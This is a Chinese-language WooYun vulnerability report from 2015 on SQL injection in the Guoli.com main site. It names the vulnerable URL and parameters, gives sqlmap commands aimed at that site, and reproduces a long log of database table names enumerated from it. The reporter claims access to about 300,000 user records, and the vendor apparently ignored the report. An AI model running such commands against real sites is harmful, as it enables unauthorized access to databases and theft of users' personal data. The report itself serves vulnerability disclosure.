当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126798

漏洞标题:果粒网主站某处SQL注入

相关厂商:果粒网

漏洞作者: Jinone

提交时间:2015-07-15 14:29

修复时间:2015-08-29 14:30

公开时间:2015-08-29 14:30

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

123

详细说明:

果粒网某处SQL注入,可获30万用户信息+百万级数据
Sqlmap -u "http://www.guoli.com/cy/index.php?&subject=00&longterm=2" --dbs

1.png

Sqlmap -u "http://www.guoli.com/cy/index.php?&subject=00&longterm=2" --count

2.png

好多哦

3.png


太多了 不跑了

[19:56:35] [INFO] retrieved: dede_addonarticle
[19:56:57] [INFO] retrieved: dede_addonflash
[19:57:06] [INFO] retrieved: dede_addonimages
[19:57:25] [INFO] retrieved: dede_addonspec
[19:57:33] [INFO] retrieved: dede_admin
[19:57:40] [INFO] retrieved: dede_admintype
[19:57:48] [INFO] retrieved: dede_ads_cmd_cate
[19:58:04] [INFO] retrieved: dede_ads_cmd_topi
[19:58:14] [INFO] retrieved: dede_arcatt
[19:58:22] [INFO] retrieved: dede_arccache
[19:58:31] [INFO] retrieved: dede_arccache_ful
[19:58:43] [INFO] retrieved: dede_archives
[19:58:52] [INFO] retrieved: dede_archivesspec
[19:59:01] [INFO] retrieved: dede_arcrank
[19:59:10] [INFO] retrieved: dede_arctype
[19:59:21] [INFO] retrieved: dede_area
[19:59:29] [INFO] retrieved: dede_cache_feedba
[19:59:57] [INFO] retrieved: dede_channeltype
[20:00:13] [INFO] retrieved: dede_cityip
[20:00:21] [INFO] retrieved: dede_clickuser
[20:00:33] [INFO] retrieved: dede_co_dataswitc
[20:00:50] [INFO] retrieved: dede_co_exrule
[20:01:01] [INFO] retrieved: dede_co_listenurl
[20:01:17] [INFO] retrieved: dede_co_mediaurl
[20:01:30] [INFO] retrieved: dede_conote
[20:01:38] [INFO] retrieved: dede_courl
[20:01:44] [INFO] retrieved: dede_error
[20:01:52] [INFO] retrieved: dede_feedback
[20:02:04] [INFO] retrieved: dede_flin
[20:02:45] [CRITICAL] connection timed out to
 going to retry the request
k
[20:02:48] [INFO] retrieved: dede_flinktype
[20:02:56] [INFO] retrieved: dede_freelist
[20:03:07] [INFO] retrieved: dede_full_search
[20:03:23] [INFO] retrieved: dede_homepageset
[20:03:38] [INFO] retrieved: dede_keywords
[20:03:52] [INFO] retrieved: dede_log
[20:03:57] [INFO] retrieved: dede_myad
[20:04:04] [INFO] retrieved: dede_mynews
[20:04:12] [INFO] retrieved: dede_mytag
[20:04:18] [INFO] retrieved: dede_plus
[20:04:25] [INFO] retrieved: dede_search_cache
[20:05:11] [INFO] retrieved: dede_search_keywo
[20:05:24] [INFO] retrieved: dede_search_rule
[20:05:33] [INFO] retrieved: dede_sectors
[20:05:42] [INFO] retrieved: dede_sgpage
[20:05:51] [INFO] retrieved: dede_smalltypes
[20:06:07] [INFO] retrieved: dede_sysconfig
[20:06:19] [INFO] retrieved: dede_tag_index
[20:06:33] [INFO] retrieved: dede_tag_list
[20:06:41] [INFO] retrieved: dede_task
[20:06:46] [INFO] retrieved: dede_uploads
[20:06:57] [INFO] retrieved: dede_vote
[20:07:04] [INFO] fetching number of tables fo
[20:07:04] [INFO] retrieved: 107
[20:07:07] [INFO] retrieved: cdb_access
[20:07:20] [INFO] retrieved: cdb_activities
[20:07:32] [INFO] retrieved: cdb_activityappli
[20:07:50] [INFO] retrieved: cdb_add
[20:08:34] [CRITICAL] connection timed out to
 going to retry the request
ons
[20:08:39] [INFO] retrieved: cdb_adminactions
[20:08:54] [INFO] retrieved: cdb_admincu
[20:09:29] [CRITICAL] connection timed out to
 going to retry the request
stom
[20:09:35] [INFO] retrieved: cdb_admingroups
[20:09:52] [INFO] retrieved: cdb_adminnotes
[20:10:02] [INFO] retrieved: cdb_adminsessions
[20:10:15] [INFO] retrieved: cdb_advertise
[20:10:56] [CRITICAL] connection timed out to
 going to retry the request
ments
[20:11:04] [INFO] retrieved: cdb_announcements
[20:11:22] [INFO] retrieved: cdb_attachmentfie
[20:11:45] [INFO] retrieved: cdb_attachments
[20:11:50] [INFO] retrieved: cdb_attachpayment
[20:12:08] [INFO] retrieved: cdb_attachtypes
[20:12:18] [INFO] retrieved: cdb_banned
[20:12:28] [INFO] retrieved: cdb_bbcodes
[20:12:38] [INFO] retrieved: cdb_caches
[20:12:47] [INFO] retrieved: cdb_category
[20:12:58] [INFO] retrieved: cdb_creditslog
[20:13:14] [INFO] retrieved: cdb_crons
[20:13:20] [INFO] retrieved: cdb_debateposts
[20:13:36] [INFO] retrieved: cdb_debates
[20:13:41] [INFO] retrieved: cdb_failedlogins
[20:13:58] [INFO] retrieved: cdb_faqs
[20:14:03] [INFO] retrieved: cdb_favoriteforum
[20:14:20] [INFO] retrieved: cdb_favorites
[20:14:25] [INFO] retrieved: cdb_favoritethrea
[20:14:38] [INFO] retrieved: cdb_feeds
[20:14:46] [INFO] retrieved: cdb_forumfields
[20:15:00] [INFO] retrieved: cdb_forumlinks
[20:15:09] [INFO] retrieved: cdb_forumrecommen
[20:15:23] [INFO] retrieved: cdb_forums
[20:15:27] [INFO] retrieved: cdb_imagetypes
[20:15:47] [INFO] retrieved: cdb_invites
[20:16:01] [INFO] retrieved: cdb_itempool
[20:16:12] [INFO] retrieved: cdb_magiclog
[20:16:24] [INFO] retrieved: cdb_magicmarket
[20:16:34] [INFO] retrieved: cdb_magics
[20:16:39] [INFO] retrieved: cdb_medallog
[20:16:50] [INFO] retrieved: cdb_medals

漏洞证明:

1.png

2.png

3.png

太多了

修复方案:

null

版权声明:转载请注明来源 Jinone@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝